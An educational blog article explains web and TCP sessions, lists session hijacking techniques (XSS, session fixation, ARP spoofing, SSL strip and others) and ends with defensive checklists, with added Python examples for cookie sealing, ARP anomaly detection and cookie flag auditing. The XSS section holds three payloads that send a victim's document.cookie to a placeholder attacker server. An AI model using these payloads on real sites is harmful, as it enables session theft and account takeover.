[EN] Session Security

PwnLab.Me
Admin, joined 21 January 2024
Written by Ekin Şiar Bayer

Hi. In this article I will talk about sessions, the session hijacking techniques applied to web applications and networks, and the methods used to prevent session hijacking.

What is a Session in Web Applications?

When we log in to a website for the first time, the website needs some information to recognize us. To obtain it, we send a request to the website, and in the response to that request we see an HTTP header named Set-Cookie. The cookie set by the Set-Cookie header is saved in the browser's local database. From then on, all the data we received with Set-Cookie is added to every request we send to the website as a Cookie: header. Our browser's local database may hold Set-Cookie data from many different websites; the browser checks the protocol, domain and port trio to decide where each piece of data is to be used.

Because HTTP itself is stateless, the server examines each request individually to check whether the session value it carries matches a session value held on the server. This is why web sessions are known as stateless sessions.

Cookies are kept in the browser's local database and are not controlled on the server side. The situation is different for the session. After logging in to a website with a username and password, the session is strongly encrypted and handed back to the user with Set-Cookie. While the user navigates between pages that require authorization, the session is added as a cookie to every request that matches the protocol, domain and port trio, and the web server checks the session data on every request to determine whether it is still active. This check is made against the website's storage, such as a /tmp directory or the database. A consequence of this design is that you cannot be logged in to a website with the same protocol, domain and port trio from the same browser with different accounts at the same time. If the session is active, the user is logged in successfully; otherwise the user is not, which means a user cannot log in with a destroyed or expired session. The website recognizes the user by the session, so as long as the session is neither destroyed nor expired, the user does not have to enter the username and password every time. To destroy the session, log out of the account or wait for the session to expire.

Besides the cookie-based sessions I mentioned, modern web session tokens such as JWT are also in use today, as are session IDs carried in the URL, which were meant for old browsers that do not support cookies. Session IDs carried in the URL can be used in parallel with each other at the same time, but they are destroyed as soon as you close the browser, and they end up in logs because they leak through the HTTP Referer header, so they are not secure.

An example of the outgoing request and the incoming response, with a JSON-like cookie value, when a cookie-based session is obtained:

POST /login HTTP/1.1
Host: ekinsiarbayer.com
Content-Type: application/x-www-form-urlencoded

username=ekin&password=1234



HTTP/1.1 302 Found
Location: ekinsiarbayer.com/dashboard
Set-Cookie: SESSION={'IV':'RANDOM_VALUE', 'session_data':['username','user_id','password']}|CHECKSUM|HMAC|BASE64_ENC

'session_data' is encrypted on the server with a symmetric-key algorithm and a checksum is appended. Next, a signature is created with HMAC. Then the whole value is encoded with base64 or another encoding, and the result is the session data handed to the browser.
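The sealing and checking steps above, as an added example that is not code from the original post: encrypt-then-MAC over the IV and the encrypted session_data with its checksum, base64 on the way out, and HMAC verification before any decryption on the way in. The HMAC-SHA256 counter keystream standing in for the symmetric cipher, the key and field lengths and the sample session data are assumptions made here; the sample omits the password that the cookie above lists, since a session should not carry it.

```python
import base64
import hashlib
import hmac
import json
import os

IV_LEN, SUM_LEN, TAG_LEN = 16, 4, 32


def _keystream_xor(key: bytes, iv: bytes, data: bytes) -> bytes:
    # Stand-in stream cipher (assumption): an HMAC-SHA256 counter keystream XORed over the data.
    # It only illustrates the IV + symmetric-key step; a real service would use AES-GCM or a
    # similar authenticated cipher from a vetted library.
    stream = bytearray()
    counter = 0
    while len(stream) < len(data):
        stream += hmac.new(key, iv + counter.to_bytes(4, "big"), hashlib.sha256).digest()
        counter += 1
    return bytes(a ^ b for a, b in zip(data, stream))


def seal_session(enc_key: bytes, mac_key: bytes, session_data: dict) -> str:
    """Build the cookie value: base64( IV || Enc(session_data || checksum) || HMAC )."""
    iv = os.urandom(IV_LEN)                       # fresh random IV per cookie
    plaintext = json.dumps(session_data, sort_keys=True).encode()
    checksum = hashlib.sha256(plaintext).digest()[:SUM_LEN]
    body = iv + _keystream_xor(enc_key, iv, plaintext + checksum)
    tag = hmac.new(mac_key, body, hashlib.sha256).digest()   # sign after encrypting
    return base64.urlsafe_b64encode(body + tag).decode()


def open_session(enc_key: bytes, mac_key: bytes, token: str):
    """Return the session dict, or None if the cookie is malformed, forged or tampered with."""
    try:
        raw = base64.urlsafe_b64decode(token.encode())
    except ValueError:            # binascii.Error is a ValueError subclass
        return None
    if len(raw) < IV_LEN + SUM_LEN + TAG_LEN:
        return None
    body, tag = raw[:-TAG_LEN], raw[-TAG_LEN:]
    expected = hmac.new(mac_key, body, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):   # constant-time check, before any decryption
        return None
    iv, ciphertext = body[:IV_LEN], body[IV_LEN:]
    decrypted = _keystream_xor(enc_key, iv, ciphertext)
    plaintext, checksum = decrypted[:-SUM_LEN], decrypted[-SUM_LEN:]
    if hashlib.sha256(plaintext).digest()[:SUM_LEN] != checksum:
        return None
    return json.loads(plaintext)


def flip_byte(token: str, index: int) -> str:
    # Test helper: corrupt one byte of the decoded cookie and re-encode it.
    raw = bytearray(base64.urlsafe_b64decode(token.encode()))
    raw[index] ^= 0x01
    return base64.urlsafe_b64encode(bytes(raw)).decode()
```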

What is the OSI Model?

OSI (Open Systems Interconnection) is the reference model that classifies, into layers, the protocols used by devices on a network to communicate with each other. I think the image below is quite self-explanatory.

[Image: osimodel0.jpg, the OSI model layers]

What is a TCP Session in Networks?

Unlike HTTP, TCP (Transmission Control Protocol) tracks each request with distinct identifiers, and not only the server but also the user plays an active role in exchanging those identifiers. That is why TCP sessions are called stateful sessions. TCP sits in the transport layer, the 4th layer of the OSI model. TCP is also known as the three-way handshake protocol, for the following reason:

  1. To start a session, the user sends the server a request carrying the SYN (synchronize) flag with a random value, such as SYN=7891. The value 7891 in this example is called the sequence number.
  2. The server then responds to the user with a SYN-ACK (synchronize-acknowledgment) packet. The SYN value returned by the server is another random number, and the ACK value returned by the server is the SYN value sent by the user in the first request plus 1, for example SYN=4567 and ACK=7892.
  3. In the last step, the user acknowledges the server's response and sends an ACK packet to the server carrying the SYN value from the server's response plus 1, i.e. ACK=4568. Now the server and the user know each other, the session is open and communication has started.

Some Protocols Used in Networks

HTTP (HyperText Transfer Protocol) is a very important protocol; nowadays HTTP/2 and even HTTP/3 are in use. HTTP is a structure that enables communication between client and server through the client's requests and the server's responses. For example, we request the index.html file from a website's server with our browser, and the web server will most likely reply with a 200 status code so that we can display the website's home page. The status codes of the responses returned by the server fall into these classes:

  • Informational 1XX
  • Successful 2XX
  • Redirection 3XX
  • Client Error 4XX
  • Server Error 5XX

Communication is not secure because the data flowing over HTTP is not encrypted, but it can be secured using TLS (HTTPS). HTTP sits in the application layer, the 7th layer of the OSI model. You can review the technical structure of HTTP requests and responses in the images below.

[Image: httpresponse.png, an HTTP response message]
[Image: HTTP_RequestMessageExample.png, an HTTP request message]


TLS (Transport Layer Security) is the application of asymmetric encryption between communicating devices. When the user requests a secure connection from the website, the website sends the user its public key together with its certificate. The user's browser verifies the certificate of the public key, generates a symmetric encryption key, encrypts this key with the website's public key and sends it to the web server. The web server recovers the symmetric key by decrypting it with its own private key. From then on, the server sends data to the user encrypted with this key, and anyone who does not have the key cannot eavesdrop on the communication. Algorithms such as RSA or AES are used for these keys. TLS runs in the presentation layer, layer 6 of the OSI model, but it is initiated at the session layer, layer 5.

UDP (User Datagram Protocol) is a different type of protocol used in networks. It performs no checks between the user and the server before sending and receiving data. It is therefore not the preferred protocol for transferring sensitive data, but it is faster than TCP. Thanks to its speed it is also used to carry data that has to be transmitted in real time, such as audio and video, and by protocols such as DNS, DHCP and TFTP. It sits in the transport layer, the 4th layer of the OSI model.

Telnet is a remote connection protocol similar to SSH. It is used for its flexibility, because it lets you connect even different operating systems to each other. However, all data on Telnet travels as plain text, so it is easily exposed to a sniffing attack by an attacker. It sits in the application layer, the 7th layer of the OSI model.

DNS (Domain Name System) is a protocol for keeping track of the domains or hostnames assigned to IP addresses. Thanks to this protocol, instead of remembering a website's IP address, we only need to remember its domain. However, DNS queries usually carry no information about the user who submitted them. DNS sits in the application layer, the 7th layer of the OSI model.

IP (Internet Protocol) addresses identify a device connected to a local network or the Internet. Every protocol has to use the IP address as a parameter in order to make an accurate request and get a response back when needed. It is used to find the address of a device on the network, and without an IP address you cannot reach anything on the network. Its downside is that it can easily become the target of spoofing attacks. IP sits in the network layer, the 3rd layer of the OSI model.

MAC (Media Access Control) addresses are built into the device's network hardware and allow the device to be recognized only on the local network; they cannot be used outside it. They are written in hexadecimal, with colons between the byte pairs, like this: 01:23:45:67:89:AB. They belong to the data link layer, layer 2 of the OSI model.

ARP (Address Resolution Protocol) is the protocol that resolves IP addresses to MAC addresses. The source computer broadcasts an ARP request to all computers on the local network to find out the MAC address of the destination computer. The source MAC address of the ARP request is that of the requesting computer, and its destination MAC address is FF:FF:FF:FF:FF:FF, the address used to send broadcast frames to every device on the network. After this broadcast, the device whose IP address is being asked about sends an ARP reply back, so the source and destination computers get to know each other. ARP works without any authentication. It sits in the network layer, the 3rd layer of the OSI model.

What is Session Hijacking?

Session hijacking is when an attacker takes over a user's session. Once the attacker holds the user's session, he can do whatever he wants on behalf of that user. The attacker has two possible goals. The first is to impersonate the user by accessing the account at the same time as the user. The second is to push the user out of the account and continue the session alone.

What are Session Hijacking Techniques?

Session hijacking can basically be divided into two categories: application level and network level.
Examples of application-level attacks:

  • Sniffing (MITM)
  • Session Fixation
  • Session ID Brute-Force
  • XSS
  • Session Donation
  • Man in the Browser

Examples of attacks at the network level:

  • Sniffing (MITM)
  • TCP Sequence Number Prediction
  • UDP Session Hijacking
  • IP Spoofing
  • Telnet Session Hijacking
  • DNS Session Hijacking
  • ARP Poisoning
  • SSL Strip

Burp Suite is the tool usually used for application-level attacks. For network-level attacks, tools such as Wireshark, bettercap, arpspoof and shijack are used.

Session Hijacking with XSS

XSS (cross-site scripting) attacks are attacks in which JavaScript code is injected into a website because user input is not properly sanitized. It is divided into three kinds: reflected, stored and DOM.

  • Reflected XSS is reflected in the source of the page and requires user interaction.
  • Stored XSS is written into the source of the page and does not require user interaction.
  • DOM (Document Object Model) XSS is reflected in objects such as images, text and forms.

If the website's sessions are cookie-based and the session cookie is not protected by the HttpOnly flag, an attacker can capture the victim's session cookie by reading document.cookie in the XSS payload. When these conditions are met, payloads such as the following send the victim's session cookies to a web server owned by the attacker, which is what an XSS to account takeover attack relies on:

  • <script>var i=new Image;i.src="http://ip:port/?"+document.cookie;</script>
  • <img src=x onerror=this.src='http://ip:port/?'+document.cookie;>
  • <img src=x onerror="this.src='http://ip:port/?'+document.cookie; this.removeAttribute('onerror');">

Session Hijacking with Session Fixation

Session fixation attacks affect applications that use a session ID. The vulnerability is exploitable if a new session ID is not assigned when the user authenticates, so the user ends up authenticated under an already existing session ID. In other words, if the attacker sends the victim a URL carrying his own session ID and the victim completes authentication through that address, the attacker gains access to the victim's account through that session ID.

Session Hijacking with Session ID Brute-Force

If the session ID is not generated and encrypted properly and can be guessed, for example a session ID made up of the current date and the session or user number as an integer, an attacker can easily brute-force the session ID, resulting in session hijacking.

Session Donation

This technique is actually a social engineering attack using a session ID in the URL.

  1. The attacker opens an account in the victim's name.
  2. The attacker then deceives the victim into logging in with a single click, using the session ID in the URL, to the account the attacker created on the victim's behalf.
  3. The victim believes he or she is carrying out all sensitive transactions in his or her own account, but because it is not actually the victim's account, the attacker gains access to all of the victim's sensitive information.

Session Hijacking with Man in the Browser

Man in the browser is a client-side MITM attack. Its aim is to gain access to the user's browser.
Common attack vectors used for this attack are:

  • Browser extensions
  • Malicious scripts
  • API hooking

When you install browser extensions, they require certain permissions to access your browser. If an extension contains malware, the attacker can do whatever he or she wants in the victim's browser, within the limits of the extension's permissions.

Malicious scripts can be used effectively when the attacker can get at the source of a website or at a JavaScript library the website loads. Examples of such situations are XSS, broken link hijacking and file upload attacks. When such a scenario arises, attackers usually create a payload with a tool called BeEF (the Browser Exploitation Framework) to make the operations they can perform in the browser easier.

API hooking is when an attacker creates malicious APIs and hooks his own malicious API into the browser's operating system process.

TCP Sequence Number Prediction

In this attack the attacker tries to guess the TCP sequence number and places the guessed value into a packet. If the crafted packet is accepted, the attacker guessed the sequence number correctly, and he can then inject data into that TCP connection or tear it down using the RST flag. Older operating systems such as BSD and Windows NT 3.5 are vulnerable to this attack because they generate predictable sequence numbers, which also shows that it is not a common attack nowadays.
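To tie the handshake numbers from the TCP section to why predictable sequence numbers matter, here is an added simulation that is not code from the original post: it builds the three handshake segments with the article's values, applies the receive-window acceptability check a TCP endpoint performs on every incoming segment, and compares how often a guess derived from one previously observed ISN lands inside that window for a fixed-step generator versus a random one. The window size, the 64000 step and the minimal endpoint model are assumptions.

```python
import os

WINDOW = 65_535          # receive window advertised by the endpoint (assumed value)
MOD = 2 ** 32            # TCP sequence numbers wrap at 32 bits


def three_way_handshake(client_isn: int, server_isn: int):
    """Return the three segments as dicts, using the article's rule ACK = peer SEQ + 1."""
    syn = {"flags": "SYN", "seq": client_isn}
    synack = {"flags": "SYN-ACK", "seq": server_isn, "ack": (syn["seq"] + 1) % MOD}
    ack = {"flags": "ACK", "seq": (syn["seq"] + 1) % MOD, "ack": (synack["seq"] + 1) % MOD}
    return syn, synack, ack


def server_state(synack: dict, ack: dict) -> dict:
    # After the handshake the server expects the client's next byte at rcv_nxt
    # and will itself continue sending from snd_nxt.
    return {"rcv_nxt": ack["seq"], "snd_nxt": ack["ack"]}


def segment_acceptable(state: dict, seq: int, window: int = WINDOW) -> bool:
    """RFC 793 acceptability test: the segment's SEQ must fall inside the receive window."""
    return (seq - state["rcv_nxt"]) % MOD < window


def sequential_isn(previous: int) -> int:
    # Old-style generator (constructed): each new connection's ISN is the previous one plus a fixed step.
    return (previous + 64_000) % MOD


def random_isn(previous: int = 0) -> int:
    # Modern generator: 32 random bits per connection, unrelated to earlier connections.
    return int.from_bytes(os.urandom(4), "big")


def guessable_rate(isn_generator, trials: int = 1000) -> float:
    """Fraction of connections for which a guess of 'previous ISN + fixed step' lands
    inside the receive window of the new connection. 1.0 means every guess is accepted;
    a value near zero means the endpoint discards the guessed segments as out of window."""
    hits = 0
    previous = random_isn()
    for _ in range(trials):
        current = isn_generator(previous)
        guess = (previous + 64_000) % MOD
        hits += segment_acceptable({"rcv_nxt": current}, guess)
        previous = current
    return hits / trials
```

Segments that fail the window check are exactly the out-of-window traffic a host answers with challenge ACKs or drops, which is the signal a sensor on the wire would see.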

UDP Session Hijacking

In this attack the attacker forges a server response and sends it to the user before the real server delivers the real response.

IP Spoofing

An IP spoofing attack is when the attacker sends the victim a request from an IP address that the victim trusts or does not perceive as a threat. To do this, the attacker has to change the source IP address of the outgoing request. The main goal of this attack is to provide anonymity.

Telnet Session Hijacking

Telnet does not examine which IP address received packets come from. It therefore cannot detect a packet from the attacker that carries the victim's IP address; it treats the packet as if it came from the victim and sends a reply. It is basically ARP spoofing.

DNS Session Hijacking

DNS session hijacking is an attack that redirects all DNS queries for the victim's website to the attacker's website by changing the DNS records of the victim's website. It is used for phishing purposes. Common attack vectors:

  • Local DNS hijacking
  • Router DNS hijacking
  • MITM DNS hijacking
  • Stealing DNS server

Local DNS hijacking is carried out by changing the local DNS settings (the hosts file) of the user's computer.

Router DNS hijacking is an attack usually carried out against routers by using their default credentials; once the router's DNS settings are changed, every device connected to the router is affected.

MITM DNS hijacking is an attack in which the attacker gets between the DNS server and the user, which results in redirection to malicious websites.

When DNS servers are stolen or hacked, the attacker can change DNS records and redirect every device that uses that DNS server to the malicious website.

ARP Spoofing

ARP spoofing attacks are cases where the attacker poisons the ARP table in which the records are kept, by pairing his own MAC address with the victim's IP address. The victim thinks the attacker is the router, and the router thinks the attacker is the victim. The attacker can then read, change or delete all communication between the victim and the router. It can only happen when the attacker and the victim are connected to the same network. It is commonly used for DoS, session hijacking and MITM attacks.
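A defender-side check for the poisoning signs described above, added here and not part of the original post: it parses a constructed ARP table in the Linux /proc/net/arp layout and reports a MAC address that answers for more than one IP, and a gateway whose MAC no longer matches a recorded baseline. The sample entries and the baseline gateway MAC are constructed values.

```python
import re
from collections import defaultdict

# Constructed sample in the layout of Linux /proc/net/arp: a header line followed by one
# entry per neighbour. 192.168.1.1 is the gateway; its known-good MAC is recorded in BASELINE.
SAMPLE_ARP_TABLE = """\
IP address       HW type     Flags       HW address            Mask     Device
192.168.1.1      0x1         0x2         de:ad:be:ef:00:99     *        eth0
192.168.1.20     0x1         0x2         de:ad:be:ef:00:99     *        eth0
192.168.1.30     0x1         0x2         00:11:22:33:44:55     *        eth0
192.168.1.40     0x1         0x0         00:00:00:00:00:00     *        eth0
"""

BASELINE = {"192.168.1.1": "aa:bb:cc:dd:ee:01"}   # gateway MAC learned earlier (constructed)

MAC_RE = re.compile(r"^([0-9a-f]{2}:){5}[0-9a-f]{2}$")


def parse_arp_table(text: str) -> dict:
    """Map IP -> MAC for complete entries (flags 0x2); incomplete entries are skipped."""
    entries = {}
    for line in text.splitlines()[1:]:
        fields = line.split()
        if len(fields) < 6:
            continue
        ip, flags, mac = fields[0], fields[2], fields[3].lower()
        if flags == "0x2" and MAC_RE.match(mac):
            entries[ip] = mac
    return entries


def find_arp_anomalies(entries: dict, baseline: dict) -> list:
    """Flag the two classic poisoning signs: one MAC answering for several IPs,
    and a baseline host (such as the gateway) whose MAC has changed."""
    findings = []
    by_mac = defaultdict(list)
    for ip, mac in entries.items():
        by_mac[mac].append(ip)
    for mac, ips in by_mac.items():
        if len(ips) > 1:
            findings.append(f"MAC {mac} claims {len(ips)} IPs: {', '.join(sorted(ips))}")
    for ip, expected in baseline.items():
        seen = entries.get(ip)
        if seen and seen != expected:
            findings.append(f"{ip} changed from {expected} to {seen}")
    return findings
```

On a real host the same parser runs over the contents of /proc/net/arp, with the baseline taken from a clean snapshot of the network.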

SSL Strip

SSL strip is used in MITM attacks to downgrade an HTTPS connection to HTTP. The technique can be used when an attacker is carrying out an ARP spoofing attack against a victim who is on a website that uses SSL/TLS. It is likewise a bypass method that can be used on proxy servers or public Wi-Fi networks. The technique works as follows:

  1. The victim sends an HTTPS request to the router.
  2. The attacker in the MITM position cannot read the encrypted HTTPS request, but can convert it to HTTP and send it on to the router.
  3. The router forwards the attacker's HTTP request to the web server.

Session Security in Web Applications:

  • The session ID should not be sequential; it should be random and mixed.
  • The session ID must be alphanumeric.
  • The session ID must be long enough that it cannot be brute-forced.
  • If the session ID is used in the URL, the URL can be sniffed and is also recorded in logs, browser history, the Referer header and search engines.
  • Carrying the session ID in a cookie is the safest way.
  • If the session ID is used in the URL, it should be used where the POST method is preferred over GET.
  • Session reuse should be avoided because it may lead to a session fixation vulnerability.
  • The session ID must not contain any PII (personally identifiable information).
  • A new session ID must be generated for each authentication.

Required Flags for a Secure Cookie:

  • HttpOnly: Prevents scripts running in the browser from accessing the cookie, so session hijacking through XSS is not possible.
  • Secure: Allows the browser to send the cookie only over an SSL/TLS-encrypted connection.
  • Max-Age/Expires: Causes the session ID to expire after a set time.
  • SameSite/Domain: Determine which sites have access to the cookie.
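An added example (not from the original post) that puts the session ID rules, the cookie flags and the session fixation advice into code: a random alphanumeric session ID from the OS CSPRNG, a Set-Cookie value carrying every flag listed above, an audit that reports which flags or ID properties a header is missing, and a login routine that discards any session ID presented before authentication. The minimum length threshold, the header builder and the in-memory session store are assumptions.

```python
import re
import secrets

ALNUM_RE = re.compile(r"^[A-Za-z0-9]+$")
MIN_ID_LEN = 32          # characters; 32 hex characters = 128 bits (assumed threshold)


def new_session_id() -> str:
    # 32 random bytes from the OS CSPRNG rendered as 64 hex characters: random,
    # alphanumeric, carries no PII and far too long to brute-force.
    return secrets.token_hex(32)


def build_set_cookie(name: str, value: str, max_age: int = 3600, samesite: str = "Lax") -> str:
    """Compose a Set-Cookie value carrying all of the flags the article lists."""
    return "; ".join([f"{name}={value}", f"Max-Age={max_age}", "Path=/",
                      "HttpOnly", "Secure", f"SameSite={samesite}"])


def audit_set_cookie(header: str) -> list:
    """Return the problems found in one Set-Cookie value; an empty list means it passes."""
    parts = [p.strip() for p in header.split(";") if p.strip()]
    name, _, value = parts[0].partition("=")
    attrs = {p.partition("=")[0].lower(): p.partition("=")[2] for p in parts[1:]}
    problems = []
    if "httponly" not in attrs:
        problems.append("missing HttpOnly (cookie readable via document.cookie)")
    if "secure" not in attrs:
        problems.append("missing Secure (cookie also sent over plain HTTP)")
    if "max-age" not in attrs and "expires" not in attrs:
        problems.append("no Max-Age/Expires (cookie never expires on the client)")
    if "samesite" not in attrs:
        problems.append("missing SameSite")
    elif attrs["samesite"].lower() == "none" and "secure" not in attrs:
        problems.append("SameSite=None requires Secure")
    if len(value) < MIN_ID_LEN:
        problems.append(f"session value shorter than {MIN_ID_LEN} characters")
    if not ALNUM_RE.match(value):
        problems.append("session value is not alphanumeric")
    if value.isdigit():
        problems.append("session value is numeric (likely sequential or guessable)")
    return problems


def login(store: dict, presented_id, username: str) -> str:
    """Authenticate a user: any session ID presented before login is discarded and a
    fresh one is issued, so an ID fixed by someone else never becomes authenticated."""
    store.pop(presented_id, None)
    sid = new_session_id()
    store[sid] = {"user": username}
    return sid
```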

Session Security in Networks:

  • Protocols such as HTTP, FTP and IMAP/POP must be wrapped in TLS to be protected from MITM attacks.
  • SSH should be used instead of Telnet.
  • SFTP should be used instead of FTP.
  • A VPN should be used where critical security measures are needed, such as on public networks.

Other Methods You Can Prefer for Session Security:

  • Generate new auth tokens for every sensitive activity instead of relying on the session ID.
  • Use the built-in session management implementations of frameworks such as J2EE, PHP and ASP.NET.
  • Make sure the server accepts the session ID only from the specific locations it expects.
  • To prevent information leakage between systems, mechanisms such as the HTML5 Web Storage API, which store data persistently in the browser, should not be used for sensitive information.
  • The session ID should be sanitized like any other user input.
  • If more than one cookie is used, each should be given a different name.
  • The user must be re-authenticated before sensitive actions.
  • The session ID should be bound to other data such as the User-Agent or IP address to prevent session hijacking.
  • 2FA should be used.
 